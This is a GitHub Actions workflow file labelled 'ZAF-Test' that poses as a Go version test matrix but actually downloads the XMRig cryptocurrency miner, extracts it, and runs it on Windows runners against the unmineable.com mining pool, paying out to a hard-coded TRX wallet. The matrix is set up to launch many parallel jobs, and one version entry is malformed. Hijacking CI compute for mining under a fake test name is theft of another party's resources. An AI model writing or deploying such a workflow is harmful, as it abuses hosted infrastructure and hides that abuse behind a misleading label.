name: ZAF
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: ZAF-Test
    runs-on: windows-latest
    strategy:
      max-parallel: 1
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-msvc-win64.zip -OutFile xmrig-6.17.0-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.17.0-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.17.0-msvc-win64\xmrig-6.17.0\xmrig.exe -o stratum+ssl://rx.unmineable.com:443 -a rx -k -u TRX:TJzKgLEC7Mjt2XuUNZ4SwBaGHT9S5Cu9Qa.AMSOnline1 -p x -t 1
    - name: DONE
      run: exit
